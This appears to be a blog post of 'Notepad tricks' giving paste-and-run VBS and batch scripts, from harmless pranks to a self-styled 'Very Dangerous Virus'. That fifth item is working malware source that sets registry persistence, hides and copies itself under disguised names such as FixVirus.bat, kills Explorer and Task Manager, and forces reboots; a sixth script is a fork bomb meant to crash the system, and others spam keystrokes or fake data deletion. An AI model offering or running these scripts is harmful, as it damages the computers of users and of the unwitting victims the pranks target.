1. Continually Pop The CD Drive

1.Open Notepad.
2.Copy the following code and paste in the notepad

Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

3.Save it as "anything.vbs" (the extension ".vbs" is ipmortant!


Note: Don’t worry when this crazy notepad trick opens your cd tray continuously. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes end the process “wscript.exe”





2. Convert Text Into Audio Using Notepad

1. Open notepad
2. Copy the following code/script and pate in the notepad

Dim Message, Speak
Message=InputBox(“Enter the text here which would be spoken”,”Speak”)
Set Speak=CreateObject(“sapi.spvoice”)
Speak.Speak Message

3.Save it as "anything.vbs" (the extension ".vbs" is important


Thats it ! Your Text to Audio converter is ready to be used. Now right click on the file and click "Edit" and type whatever text you want to convert and Save it.






3. Matrix Effect

1. Open notepad
2. Copy the following code/script and paste in the notepad

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

3. Save it as "anything.bat" (the extension ".bat" is important)





4. Type “You are a fool” Continuously

1. Open notepad
2. Copy and paste the following code/script in notepad

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.
loop

NOTE: You can type anything in the pink highlighted area

3. Save it as "anything.vbs" (extension ".vbs" is important)






5. Very Dangerous Virus

1. Open notepad
2. Copy and paste the following code/script in notepad 

@Echo off
color 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
tskill explorer
tskill taskmgr
tskill 
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP


3. Save it as "anything.bat" (extension ".bat" is important)


What will this virus do?
   It will
    1. Copy itself into startup
    2. Copy itself over one thousand times into random spots in your computer
    3. Hide its self and all other created files
    4. Task kill MSN, Norton, Windows Explorer, Limewire,Task Manager,Explorer.
    5. Swap the left mouse button with the right one
    6. Opens alert boxes

    7. Changes the time to 12:00 and shuts down the computer 






NOTE:Don't run this on your own computer/laptop!





6. Popup CMD until the system crashes

1.Open notepad
2.Copy and paste the following code/script

@echo off
:crash
start
goto crash

3. Save it as "anything.bat" (extension ".bat" is important"




7. Another notepad virus

Notepad virus.
Description: This prank will make your friends think that all of their files are being deleted and then at the end the file deletes itself so it is untraceable.

1. Go into Notepad.
2. Enter the text below into notepad


@echo off
echo do you want to delete all of your computer data? (y/n)
pause >nul
echo Do not exit out of the screen or all computer data will be deleted.
ping localhost -n 2 > nul
echo Are you sure you want to delete all computer data? (y/n)
pause >nul
echo deleting all data...
echo.
echo.
pause localhost -n 2 > nul
dir /s
echo.
echo.
ping localhost -n 2 > nul
cls
echo error.. error.. Not all data deleted, are you sure you wish to stop? (y/n)
pause
echo.
echo.
ping localhost -n 1 > nul
cls
dir /s
echo.
echo.
ping localhost -n 2 >nul
cls
echo all data has been deleted..
pause
del "c:delete.bat"

3. Save this as "anything.bat" (the extension ".bat" is imp) 


Thanks for visiting our Blog!

Post a Comment

 
Top